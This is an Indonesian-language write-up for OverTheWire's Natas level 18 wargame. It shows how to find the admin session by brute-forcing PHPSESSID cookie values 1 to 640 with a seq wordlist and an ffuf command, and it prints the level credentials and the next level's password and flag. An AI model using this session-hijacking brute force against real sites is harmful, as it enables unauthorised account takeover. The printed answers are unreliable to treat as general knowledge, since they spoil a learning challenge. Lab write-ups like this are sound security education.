Writeup Aria
Natas

Level 18

soal

Username: natas18 URL: http://natas18.natas.labs.overthewire.org

solve

  • login with cred natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
  • terdapat web yang dimana login admin ditentukan oleh value cookie=<angka_random> dari 1-640
  • jadi kita hanya perlu melakukan brute force fuzzing saja dengan ffuf
  • buat terlebih dahulu wordlistnya 1 - 640 
    seq 1 640 > /tmp/ids.txt
  • bruteforce fuzz 
    ffuf -u http://natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ@natas18.natas.labs.overthewire.org/ -H "Cookie: PHPSESSID=FUZZ" -w /tmp/ids.txt -fr "You are logged in as a regular user"
    outputnya: 119
  • lalu tinggal copy paste ke cookie webnya dan berhasil mendapatkan password natas19 
     You are an admin. The credentials for the next level are:
 Username: natas19
 Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

flag

tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

Level 17

Previous Page

Level 19

Next Page

On this page

soalsolveflag